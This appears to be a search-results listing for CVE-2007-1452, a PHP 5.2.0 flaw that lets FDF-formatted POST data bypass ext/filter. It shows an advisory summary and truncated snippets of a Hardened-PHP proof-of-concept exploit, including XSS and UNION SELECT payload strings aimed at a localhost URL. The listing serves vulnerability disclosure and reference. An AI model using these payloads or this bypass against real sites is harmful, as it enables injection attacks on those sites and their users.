4 matches found
SUSE CVE-2007-1452
The FDF support ext/fdf in PHP 5.2.0 and earlier does not implement the input filtering hooks for ext/filter, which allows remote attackers to bypass web site filters via an application/vnd.fdf formatted POST...
PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit
No description provided by source. ?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || // // | |/ || '|/ |/ -| ' / -/ |||| /| || / //...
PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit
No description provided by source. ?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || \ // // | |/ || '|/ |/ -| ' \ / -/ |||| /| || / // // ||||,||| ,|||||||,| || |||||| // // // // Proof of concept code from the Hardened-PHP...
PHP 5.2.0 - EXT/Filter FDF Post Filter Bypass
alert/XSS/;"; $POST'var2' = " ' UNION SELECT "; $url = "http://127.0.0.1/info.php"; // You do not need to change anything below this $outfdf = fdfcreate; foreach $POST as $key = $value fdfsetvalue$outfdf, $key, $value, 0; fdfsave$outfdf, "outtest.fdf"; fdfclose$outfdf; $ret = filegetc...